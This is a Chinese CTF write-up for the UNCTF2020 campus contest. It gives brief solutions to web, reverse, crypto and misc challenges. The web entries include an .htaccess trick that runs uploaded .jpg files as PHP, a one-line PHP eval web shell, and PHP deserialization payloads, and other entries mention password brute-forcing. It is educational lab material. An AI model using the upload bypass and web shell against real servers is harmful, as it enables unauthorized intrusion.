
比赛:UNCTF2020校内赛
ID:Satan9a
xuxuan AN_666 Xunflash
查看源代码,发现有一个压缩包
下载下来
发现有
打开即可得到flag
解题过程:
上传题,测试不能上传php,phtml等,发现数据库是apache,尝试上传.htaccess文件,文件内容
plain
AddType application/x-httpd-p\
hp .jpg
上传hp.jpg
内容
plain
<?=eval($_POST[satan]);
连接蚁剑得到flag
解题过程:
反序列化字符串逃逸,构造payload
plain
challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy"};;;
得出flag
解题过程:
原题,构造payload
plain
data=a:2:{s:8:"username";b:1;s:8:"password";b:1;}
得到flag
使用pwntools
解题过程:
打开ida搜welcome,按f5
得到伪代码,可知与str2比较,双击跳转
双击,后面的按r转换成字符
解题过程:附件的图片是一些符号,一点都看不懂,提示说是office,于是打开office![图片]
的字体,发现里面的字体正好是这些符号,于是一个个对比过去,把附件里的符号全部输入到office,然后转换为宋体
得到flag
看到营养想到培根加密
将o替换位A,t替换为B
解密即可
得到d
第一小问找规律即可
第二小问
第三小问
sqrt[2020]{2020!}-frac{1}{112}-frac{28pi}{3}
md5加密即可
解题过程:
下载脚本https://github.com/WangYihang/UsbMiceDataHacker,下载后放到wireshark根目录,附件也放进去,管理员运行cmd,cd到wireshark根目录,输入
plain
python2 UsbMiceDataHacker.py mouse_click.pcapng LEFT
得出flag
解题过程:
010editor打开文件,底部有一串base64字符,解码后得到一串hex码,但是得不出东西,根据题目名称提示,将hex码倒序输出,再使用010editor生成文件得出压缩包,有密码,爆破六位数密码后得出flag
解题过程:
shadow是linux /etc/shadow文件,文本打开,有一行guguguguji后面接了md5,根据shadow文件格式,md5解密结果123456即密码.
解题过程:打开文件,格式是一个没有见过的编码,但是很熟悉,和Ook编码很像,尝试一下,把“就这.”换成“Ook.”,“就这¿”换成“Ook?”,“不会吧!”换成“Ook!”。然后解密,得到flag!
解题过程:
使用imgmagick里面的montage拼图
plain
montage unctf*.png -tile 15*15-geometry +0+0 flag.png
然后gaps拼图
plain
gaps --image=flag.png --size=60 --save
解题过程:打开txt,是一段字母,尝试词频分析没有用,全选复制到wps,发现有多处留白,百度得知是零宽度字符串隐写,http://330k.github.io/misc_tools/unicode_steganography.html
解题过程:解压文件,有一段拨号音,不知道要干什么,尝试解压里面的压缩包,发现要密码,猜测电话号码就是密码,11位数字密码爆破
得到flag
有一个b站地址
flag在评论区
放BT5里
cat flag
直接得到flag
解摩丝码
拿到屠龙刀
打了第一个boss
做异或 开第二个宝箱
购买hint2
修改hint2提示的那个文件
打倒第三个boss
拿到flag
后缀改成zip解压, 打开/xl/sharedstring.xml
阴间签到,验证码纯眼看,连对十次就可以得到flag了。
本文作者:Xunflash
本文链接:https://xunflash.top/index.php/archives/unctf2020.html
最后修改时间:2021-10-25 21:32:11
本站未注明转载的文章均为原创,并采用 CC BY-NC-SA 4.0 授权协议,转载请注明来源,谢谢!